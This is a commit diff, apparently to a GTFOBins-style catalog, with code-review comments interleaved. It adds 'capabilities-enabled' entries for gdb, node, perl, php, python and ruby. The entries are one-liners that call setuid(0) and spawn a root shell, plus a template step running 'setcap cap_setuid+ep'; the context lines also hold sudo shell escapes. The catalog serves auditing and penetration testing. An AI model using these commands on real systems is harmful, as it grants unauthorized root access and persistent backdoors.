Add the capabilities-enabled function
This uses `setcap` to persist root privileges on Linux.
This commit is contained in:
commit
2e477b25de
@ -76,6 +76,13 @@ sudo-enabled:
|
|||||||
It runs in privileged context and may be used to access the file system,
|
It runs in privileged context and may be used to access the file system,
|
||||||
escalate or maintain access with elevated privileges if enabled on `sudo`.
|
escalate or maintain access with elevated privileges if enabled on `sudo`.
|
||||||
|
|
||||||
|
capabilities-enabled:
|
||||||
|
label: Capabilities
|
||||||
|
description: |
|
||||||
|
It can manipulate its process UID and in Linux systems it can be set with the
|
||||||
|
`CAP_SETUID` capability to make it work as a backdoor to maintain elevated privileges.
|
||||||
|
This also works if the binary is invoked by another binary with the capability set.
|
||||||
|
|
||||||
suid-limited:
|
suid-limited:
|
||||||
label: Limited SUID
|
label: Limited SUID
|
||||||
description: |
|
description: |
|
||||||
|
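Review bot: The last sentence of the new `capabilities-enabled` description ("This also works if the binary is invoked by another binary with the capability set") appears to overstate the case: as far as I read capabilities(7), a file capability granted with `+ep` is not carried across `execve` into a binary that has no file capabilities of its own unless the caller also places it in its inheritable or ambient set, so the invoked binary would normally start without `CAP_SETUID`. Consider qualifying it, e.g. `This also works if the binary is invoked by another binary that passes the capability on through its inheritable or ambient set.` The first sentence also reads awkwardly, since "it can be set with the `CAP_SETUID` capability" has no clear subject; `on Linux the binary can be granted the CAP_SETUID capability` would be clearer. The surrounding `sudo-enabled` and `suid-limited` entries are unchanged context here.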
@ -12,4 +12,7 @@ functions:
|
|||||||
gdb -nx -ex "dump value $LFILE \"DATA\"" -ex quit
|
gdb -nx -ex "dump value $LFILE \"DATA\"" -ex quit
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||||
|
capabilities-enabled:
|
||||||
|
- description: Only if it has been compiled with Python support.
|
||||||
|
code: ./gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
|
||||||
---
|
---
|
||||||
|
@ -30,4 +30,7 @@ functions:
|
|||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: |
|
- code: |
|
||||||
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||||
|
capabilities-enabled:
|
||||||
|
- code: |
|
||||||
|
./node -e 'process.setuid(0); require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||||
---
|
---
|
||||||
|
@ -12,4 +12,6 @@ functions:
|
|||||||
- code: ./perl -e 'exec "/bin/sh";'
|
- code: ./perl -e 'exec "/bin/sh";'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo perl -e 'exec "/bin/sh";'
|
- code: sudo perl -e 'exec "/bin/sh";'
|
||||||
|
capabilities-enabled:
|
||||||
|
- code: ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
|
||||||
---
|
---
|
||||||
|
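Review bot: The new example imports `setuid` into the current package with `use POSIX qw(setuid)` and then calls it fully qualified as `POSIX::setuid(0)`, so the import list does nothing. Either `use POSIX qw(setuid); setuid(0);` or `use POSIX (); POSIX::setuid(0);` expresses the same thing without the redundancy, and both keep the one-liner's behaviour unchanged. The other entries in this file (`./perl -e 'exec "/bin/sh";'`) favour the terse form, so the unqualified call is the more consistent choice.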
@ -46,4 +46,8 @@ functions:
|
|||||||
- code: |
|
- code: |
|
||||||
CMD="/bin/sh"
|
CMD="/bin/sh"
|
||||||
sudo php -r "system('$CMD');"
|
sudo php -r "system('$CMD');"
|
||||||
|
capabilities-enabled:
|
||||||
|
- code: |
|
||||||
|
CMD="/bin/sh"
|
||||||
|
./php -r "posix_setuid(0); system('$CMD');"
|
||||||
---
|
---
|
||||||
|
@ -34,4 +34,6 @@ functions:
|
|||||||
- code: ./python2 -c 'import os; os.system("/bin/sh -p")'
|
- code: ./python2 -c 'import os; os.system("/bin/sh -p")'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo python2 -c 'import os; os.system("/bin/sh")'
|
- code: sudo python2 -c 'import os; os.system("/bin/sh")'
|
||||||
|
capabilities-enabled:
|
||||||
|
- code: ./python2 -c 'import os; os.setuid(0); os.system("/bin/sh")'
|
||||||
---
|
---
|
||||||
|
@ -34,4 +34,6 @@ functions:
|
|||||||
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
|
- code: ./python3 -c 'import os; os.system("/bin/sh -p")'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
|
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
|
||||||
|
capabilities-enabled:
|
||||||
|
- code: ./python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
|
||||||
---
|
---
|
||||||
|
@ -29,4 +29,6 @@ functions:
|
|||||||
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo ruby -e 'exec "/bin/sh"'
|
- code: sudo ruby -e 'exec "/bin/sh"'
|
||||||
|
capabilities-enabled:
|
||||||
|
- code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'
|
||||||
---
|
---
|
||||||
|
@ -30,6 +30,10 @@ layout: common
|
|||||||
cp $(which {{ bin_name }}) .
|
cp $(which {{ bin_name }}) .
|
||||||
sudo sh -c 'chown 0 ./{{ bin_name }}; chmod +s ./{{ bin_name }}'
|
sudo sh -c 'chown 0 ./{{ bin_name }}; chmod +s ./{{ bin_name }}'
|
||||||
{% endif %}
|
{% endif %}
|
||||||
|
{%- if function_name == 'capabilities-enabled' %}
|
||||||
|
cp $(which {{ bin_name }}) .
|
||||||
|
sudo setcap cap_setuid+ep {{ bin_name }}
|
||||||
|
{% endif %}
|
||||||
{{ example.code }}
|
{{ example.code }}
|
||||||
{% endcapture %}
|
{% endcapture %}
|
||||||
|
|
||||||
|
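Review bot: The new `setcap` line addresses the copied binary as `{{ bin_name }}` while the SUID branch a few lines above uses `./{{ bin_name }}`; `setcap` takes a file path rather than doing a PATH lookup, so both resolve to the copy in the working directory, but the bare name reads as if the system binary were being modified. `sudo setcap cap_setuid+ep ./{{ bin_name }}` keeps the two branches parallel and makes it explicit that only the local copy is changed. The new branch also opens with `{%- if`, which strips preceding whitespace, whereas the SUID branch's closing `{% endif %}` is a plain tag; if its opening `if` (outside this hunk) is also plain, the rendered spacing between the two blocks will differ.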